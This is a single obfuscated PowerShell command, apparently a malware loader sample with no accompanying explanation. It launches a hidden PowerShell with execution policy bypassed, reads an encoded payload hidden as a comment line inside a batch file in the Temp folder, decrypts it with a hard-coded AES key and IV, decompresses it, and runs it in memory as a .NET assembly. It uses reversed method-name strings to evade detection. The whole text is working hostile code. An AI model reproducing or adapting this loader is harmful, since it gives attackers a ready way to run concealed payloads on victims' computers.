"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $ESXom = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($nboag in $ESXom) { if ($nboag.StartsWith(':: ')) { $BVaSZ = $nboag.Substring(3); break; }; };$kCmVw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($BVaSZ);$eLFSC = New-Object System.Security.Cryptography.AesManaged;$eLFSC.Mode = [System.Security.Cryptography.CipherMode]::CBC;$eLFSC.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$eLFSC.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5l57QE5S9Q7zd5+Bh+XnYYwwzIwQ2OWrX6FXvhoqhNU=');$eLFSC.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X69qeK5Q4la2LJmbSRyhJQ==');$SCino = $eLFSC.CreateDecryptor();$kCmVw = $SCino.TransformFinalBlock($kCmVw, 0, $kCmVw.Length);$SCino.Dispose();$eLFSC.Dispose();$GnclG = New-Object System.IO.MemoryStream(, $kCmVw);$kxUUr = New-Object System.IO.MemoryStream;$vPwQV = New-Object System.IO.Compression.GZipStream($GnclG, [IO.Compression.CompressionMode]::Decompress);$vPwQV.CopyTo($kxUUr);$vPwQV.Dispose();$GnclG.Dispose();$kxUUr.Dispose();$kCmVw = $kxUUr.ToArray();$pGoAa = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($kCmVw);$ZaIus = $pGoAa.EntryPoint;$ZaIus.Invoke($null, (, [string[]] ('')))